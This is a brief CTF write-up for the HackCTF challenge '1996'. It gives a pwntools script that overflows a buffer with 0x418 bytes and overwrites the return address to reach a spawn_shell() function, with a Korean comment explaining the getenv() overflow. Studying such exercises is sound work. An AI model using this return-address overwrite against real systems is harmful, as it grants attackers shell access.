CTF write-up/hackctf
[hack-ctf]1996
youngsouk
2019. 7. 15. 08:34
from pwn import *
p = remote('ctf.j0n9hyun.xyz', 3015)
context.log_level = "debug"
p.recv()
payload = 'a' * 0x418 + p64(0x400897)
p.sendline(payload)
p.interactive()
getenv() 함수에서 bof 터뜨려서 spawn_shell()함수를 실행시킨다.
